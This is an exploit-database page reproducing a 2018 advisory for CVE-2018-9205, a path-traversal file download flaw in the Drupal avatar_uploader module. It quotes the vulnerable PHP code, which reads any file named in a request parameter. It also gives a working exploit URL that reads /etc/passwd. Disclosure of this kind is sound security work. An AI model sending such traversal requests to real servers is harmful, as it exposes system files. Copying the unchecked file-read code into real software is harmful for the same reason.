Advertisement






Drupal Avatar Uploader 7.x-1.0-beta8 Arbitary File Download

CVE Category Price Severity
CVE-2018-9205 CWE-434 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2018-04-23
CPE
cpe:cpe:/a:drupal:avatar-uploader:7.x-1.0-beta8
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02192 0.7801

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018040184

Below is a copy:

Drupal Avatar Uploader 7.x-1.0-beta8 Arbitary File Download
Title: Arbitrary file download vulnerability in Drupal module avatar_uploader v7.x-1.0-beta8
Author: Larry W. Cashdollar
Date: 2018-03-30
CVE-ID:[CVE-2018-9205]
Download Site: https://www.drupal.org/project/avatar_uploader
Vendor: https://www.drupal.org/u/robbinzhao
Vendor Notified: 2018-04-02
Vendor Contact: https://www.drupal.org/project/avatar_uploader/issues/2957966#comment-12554146
Advisory: http://www.vapidlabs.com/advisory.php?v=202
Description: This module used Simple Ajax Uploader, and provide a basic uploader panel, for more effect, you can do your custom javascript. Such as, users' mouse hover on avatar, the edit link will slideup, or others.
Vulnerability:
The view.php contains code to retrieve files but no code to verify a user should be able to view files or keep them from changing the path to outside of the uploadDir directory


<?php

$file = $_GET['file'];

echo file_get_contents("uploadDir/$file");
exit


Exploit Code:
aC/ http://example.com/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum